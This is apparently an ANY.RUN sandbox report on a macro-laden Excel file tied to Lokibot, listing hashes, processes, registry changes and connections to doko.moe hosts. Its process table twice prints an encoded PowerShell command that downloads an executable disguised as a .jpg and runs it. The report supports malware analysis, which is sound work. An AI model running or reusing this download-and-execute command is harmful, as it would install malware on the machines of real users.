analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2018-12-03-attached-Excel-spreadsheet-with-macro-for-Lokibot

Full analysis: https://app.any.run/tasks/610aae02-31c1-4749-aad5-0c5de8f7f794
Verdict: Malicious activity
Analysis date: January 18, 2019, 04:17:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Dec 3 09:02:11 2018, Last Saved Time/Date: Mon Dec 3 09:02:16 2018, Security: 0
MD5:

500F84B83BE685009C136A67690CA0C3

SHA1:

8BB1B60C27FAF7F303818CCC8597DDA69329F892

SHA256:

E1B71889471217B5F6C3750D0BEF0054217BEF58962B113788A2849872D205D6

SSDEEP:

1536:rDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAiEpZDA5ttmYwIuh0Cmcs/1hT:rDZ+RwPONXoRjDhIcp0fDlaGGx+cL26u

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3000)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3000)
    • Executes PowerShell scripts

      • cMD.exe (PID: 3244)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3928)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3000)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: PC
LastModifiedBy: PC
Software: Microsoft Excel
CreateDate: 2018:12:03 09:02:11
ModifyDate: 2018:12:03 09:02:16
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Worksheets
  • 3
CompObjUserTypeLen: 38
CompObjUserType: Microsoft Office Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3244cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBfAGIAMQBJAFoAUQBGAG4AdABfADYANwB2AHoARAA0AGsAZgBNAGkAWABqACAAKAAgACQAQgBCAEUAWgBPAFYAYgBIAGIAbwBDAEgAVQBYADMAXwBRAE0AUwBfAE4AIAAsACAAJABTAF8AUwBqAE4AWgBRAHEAYwBjAHUARwBYAEoAbwBYAFcAZgB3AGQARgAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAEIAQgBFAFoATwBWAGIASABiAG8AQwBIAFUAWAAzAF8AUQBNAFMAXwBOACAALAAgACQAUwBfAFMAagBOAFoAUQBxAGMAYwB1AEcAWABKAG8AWABXAGYAdwBkAEYAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAUwBfAFMAagBOAFoAUQBxAGMAYwB1AEcAWABKAG8AWABXAGYAdwBkAEYAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAE8AWQBoAGsAOQBtAFcARQBIAE0AZQBRAGoAbQA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwASABrAE0AaQBUAFEAWAAyAF8ARQBLADcAbgBJAEQATgBLAHUAbwAuAGUAeABlACcAOwANAAoARQBfAGIAMQBJAFoAUQBGAG4AdABfADYANwB2AHoARAA0AGsAZgBNAGkAWABqACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHQAawBlAG4AYwBuAC4AagBwAGcAJwAgACQASwBPAFkAaABrADkAbQBXAEUASABNAGUAUQBqAG0AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=C:\Windows\system32\cMD.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3928PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBfAGIAMQBJAFoAUQBGAG4AdABfADYANwB2AHoARAA0AGsAZgBNAGkAWABqACAAKAAgACQAQgBCAEUAWgBPAFYAYgBIAGIAbwBDAEgAVQBYADMAXwBRAE0AUwBfAE4AIAAsACAAJABTAF8AUwBqAE4AWgBRAHEAYwBjAHUARwBYAEoAbwBYAFcAZgB3AGQARgAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAEIAQgBFAFoATwBWAGIASABiAG8AQwBIAFUAWAAzAF8AUQBNAFMAXwBOACAALAAgACQAUwBfAFMAagBOAFoAUQBxAGMAYwB1AEcAWABKAG8AWABXAGYAdwBkAEYAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAUwBfAFMAagBOAFoAUQBxAGMAYwB1AEcAWABKAG8AWABXAGYAdwBkAEYAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAE8AWQBoAGsAOQBtAFcARQBIAE0AZQBRAGoAbQA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwASABrAE0AaQBUAFEAWAAyAF8ARQBLADcAbgBJAEQATgBLAHUAbwAuAGUAeABlACcAOwANAAoARQBfAGIAMQBJAFoAUQBGAG4AdABfADYANwB2AHoARAA0AGsAZgBNAGkAWABqACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHQAawBlAG4AYwBuAC4AagBwAGcAJwAgACQASwBPAFkAaABrADkAbQBXAEUASABNAGUAUQBqAG0AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
Total events
832
Read events
729
Write events
96
Delete events
7

Modification events

(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:%#,
Value:
25232C00B80B0000010000000000000000000000
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation:writeName:MTTT
Value:
B80B00003ED1DBCDE4AED40100000000
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete valueName:%#,
Value:
25232C00B80B0000010000000000000000000000
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete keyName:
Value:
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation:delete keyName:
Value:
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3000) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EBAD
Operation:writeName:20EBAD
Value:
04000000B80B00006200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0032003000310038002D00310032002D00300033002D00610074007400610063006800650064002D0045007800630065006C002D00730070007200650061006400730068006500650074002D0077006900740068002D006D006100630072006F002D0066006F0072002D004C006F006B00690062006F0074002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000D001C3CEE4AED401ADEB2000ADEB200000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3000EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE785.tmp.cvr
MD5:
SHA256:
3928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21VOWJXA0LLY1WILATT3.temp
MD5:
SHA256:
3928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ef36.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3928
powershell.exe
151.139.128.10:443
c.doko.moe
Highwinds Network Group, Inc.
US
malicious
3928
powershell.exe
185.83.215.2:443
a.doko.moe
PT
suspicious

DNS requests

Domain
IP
Reputation
a.doko.moe
  • 185.83.215.2
unknown
c.doko.moe
  • 151.139.128.10
malicious

Threats

Found threats are available for the paid subscriptions
3 ETPRO signatures available at the full report
No debug info